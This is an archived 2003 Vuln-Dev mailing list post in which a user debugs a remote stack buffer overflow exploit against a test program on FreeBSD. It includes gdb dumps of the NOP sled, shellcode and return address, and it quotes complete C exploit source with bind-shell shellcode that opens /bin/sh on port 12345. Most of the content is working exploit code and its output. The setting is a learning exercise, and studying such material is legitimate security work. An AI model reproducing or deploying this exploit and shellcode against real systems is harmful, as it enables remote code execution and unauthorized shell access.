NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 2003-q3

Re: sample buffer overflow exploit problem

From: Ganbold (ganboldmicom.mng.net)
Date: Tue Sep 30 2003 - 20:06:52 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi Orlando,

I tested your modified exploit.
When I run exploit with offset 320:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 320
scsize: 131
ret: 0xbfbffa40
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
-----------------------------------------------------------------------------------------------------------------------------
It binds shell to port 12345. When I make connection to it in gdb I see
following:
-----------------------------------------------------------------------------------------------------------------------------
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbfbffa8f in ?? ()
(gdb) x/200bx $esp-200
0xbfbff9c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa10: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa18: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa20: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa38: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa40: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
-----------------------------------------------------------------------------------------------------------------------------
As you see shellcode is not full, I see only half of my shellcode.
So when exploit run server doesn't crash and binds shell port. But when I
make connection
to 12345 port, server crashes and x/200bx $esp-200 command shows above half
of my shellcode.

Following is register information after crash:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax 0x9 9
ecx 0xbfbffaec -1077937428
edx 0xbfbffacc -1077937460
ebx 0x9 9
esp 0xbfbffa90 0xbfbffa90
ebp 0xbfbffa40 0xbfbffa40
esi 0xbfbffb80 -1077937280
edi 0x8 8
eip 0xbfbffa8f 0xbfbffa8f
eflags 0x10206 66054
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000)
st1 -nan(0x000002000) (raw 0xffff0000000000002000)
st2 0 (raw 0x00000000000000000000)
st3 0 (raw 0x00000000000000000000)
st4 0 (raw 0x00000000000000000000)
st5 3.6715164242195896804332733154296875e-10 (raw
0x3fdfc9d8000000000000)
st6 24 (raw 0x4003c000000000000000)
st7 60 (raw 0x4004f000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
But when I run exploit with 0 offset I see different situation:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 0
scsize: 131
ret: 0xbfbffb80
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGILL, Illegal instruction.
0xbfbffb8c in ?? ()
(gdb) x/300bx $esp-300
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
                                                      ^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
0xbfbffa90: 0xc0 0x50 0x53 0x50 0xb0 0x5a 0xcd 0x80
0xbfbffa98: 0xb0 0x01 0x50 0x53 0x50 0x83 0xc0 0x59
0xbfbffaa0: 0xcd 0x80 0xb0 0x02 0x50 0x53 0x50 0x83
0xbfbffaa8: 0xc0 0x58 0xcd 0x80 0x31 0xc0 0x50 0x68
0xbfbffab0: 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69
0xbfbffab8: 0x6e 0x89 0xe3 0x50 0x53 0x89 0xe2 0x50
0xbfbffac0: 0x52 0x53 0x50 0xb0 0x3b 0xcd 0x80 0x31
0xbfbffac8: 0xc0 0x40 0x50 0x50 0xcd 0x80 0x90 0x90
                                                                            ^^^^^^
shellcode ends
0xbfbffad0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffad8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffae0: 0x90 0x90 0x90 0x90 0x80 0xfb 0xbf 0xbf
                                                                 ^^^^^^
return address
0xbfbffae8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffaf0: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffaf8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb00: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb08: 0x80 0xfb 0xbf 0x2c 0x20 0x6e 0x69 0x63
                                          ^^^^^^ ends here
0xbfbffb10: 0x65 0x20 0x74 0x6f 0x20 0x6d 0x65 0x65
0xbfbffb18: 0x74 0x20 0x79 0x6f 0x75 0x21 0x0d 0x0a
0xbfbffb20: 0x00 0x00 0x00 0x00 0x74 0x02 0x76 0xfc
0xbfbffb28: 0x00 0x00 0x00 0x00 0x41 0xc6 0x04 0x28
0xbfbffb30: 0x7e 0xf7 0x0f 0x28 0x60 0x00 0x00 0x00
0xbfbffb38: 0x10 0x00 0x00 0x00 0x07 0x00 0x00 0x00
0xbfbffb40: 0x06 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0xbfbffb48: 0x6c 0xfb 0xbf 0xbf 0x6c 0xfb 0xbf 0xbf
0xbfbffb50: 0x15 0x87 0x04 0x08 0x02 0x00 0x00 0x00
0xbfbffb58: 0x74 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb60: 0x68 0xfb 0xbf 0xbf 0x00 0x00 0x00 0x00
0xbfbffb68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffb70: 0x02 0x00 0x00 0x00
-----------------------------------------------------------------------------------------------------------------------------
As you see I see all my shellcode and return address fully.
Following is the register infos:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax 0xffffffff -1
ecx 0x9 9
edx 0xffffffff -1
ebx 0x2 2
esp 0xbfbffb74 0xbfbffb74
ebp 0xbfbffb80 0xbfbffb80
esi 0xbfbffb80 -1077937280
edi 0xbfbffcb2 -1077936974
eip 0xbfbffb8c 0xbfbffb8c
eflags 0x10246 66118
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000)
st1 -nan(0x000002000) (raw 0xffff0000000000002000)
st2 0 (raw 0x00000000000000000000)
st3 0 (raw 0x00000000000000000000)
st4 0 (raw 0x00000000000000000000)
st5 0 (raw 0x00000000000000000000)
st6 0 (raw 0x00000000000000000000)
st7 10 (raw 0x4002a000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
I'm very confused and I don't know yet what to do.
Please give me some advice.

thanks in advance,

Ganbold

At 01:45 PM 9/30/2003 -0500, you wrote:
>attachment
>
>#include <stdio.h>
>#include <netinet/in.h>
>#include <netdb.h>
>#include <sys/socket.h>
>#include <sys/types.h>
>#include <errno.h>
>#include <unistd.h>
>
>/*
> * FreeBSD shellcode - binds /bin/sh to a port 12345
> *
> * Claes M. Nyberg 20020619
> *
> * <cmndarklab.org>, <md0claesmdstud.chalmers.se>
> */
>char shellcode[]
>=
>/* port _______*/
>
>"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
>
>"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
>
>"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
>
>"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
>
>"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
>
>"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
>
>"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
> "\x40\x50\x50\xcd\x80";
>#define RET 0xbfbffb80 //0xbfbffa48
>
>int exec_sh(int sockfd)
>{
> char snd[4096],rcv[4096];
> fd_set rset;
> while(1)
> {
> FD_ZERO(&rset);
> FD_SET(fileno(stdin),&rset);
> FD_SET(sockfd,&rset);
> select(255,&rset,NULL,NULL,NULL);
> if(FD_ISSET(fileno(stdin),&rset))
> {
> memset(snd,0,sizeof(snd));
> fgets(snd,sizeof(snd),stdin);
> write(sockfd,snd,strlen(snd));
> }
> if(FD_ISSET(sockfd,&rset))
> {
> memset(rcv,0,sizeof(rcv));
> if(read(sockfd,rcv,sizeof(rcv))<=0)
> exit(0);
> fputs(rcv,stdout);
> }
> }
>}
>
>int main(int argc, char *argv[]) {
>
> char buffer[1064];
> int s,t, i, size,offset;
> struct sockaddr_in remote;
> struct hostent *host;
>
> if(argc != 4) {
> printf("Usage: %s target-ip port offset\n", argv[0]);
> return -1;
> }
> offset = RET - atoi(argv[3]);
> // filling buffer with NOPs
> memset(buffer, 0x90, 1064);
>
> printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);
> //copying shellcode into buffer
> memcpy(buffer+1001-sizeof(shellcode) , shellcode,
>sizeof(shellcode)-1);
>
> // Copying the return address multiple times at the end of the
>buffer...
> for(i=1022; i < 1060; i+=4) {
> * ((int *) &buffer[i]) = offset;
> }
>
> buffer[1061] = 0x0;
>
> //getting hostname
>
> host=gethostbyname(argv[1]);
> if (host==NULL)
> {
> fprintf(stderr, "Unknown Host %s\n",argv[1]);
> return -1;
> }
>
> // creating socket...
> s = socket(AF_INET, SOCK_STREAM, 0);
> if (s < 0)
> {
> fprintf(stderr, "Error: Socket\n");
> return -1;
> }
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(atoi(argv[2]));
> // connecting with destination host
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> //sending exploit string
> size = send(s, buffer, sizeof(buffer), 0);
> if (size==-1)
> {
> close(s);
> fprintf(stderr, "sending data failed\n");
> return -1;
> }
>/*
> printf("[-] Connecting to bindshell...\n");
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(12345);
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> exec_sh(s);
>*/
> // closing socket
> close(s);
>}

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]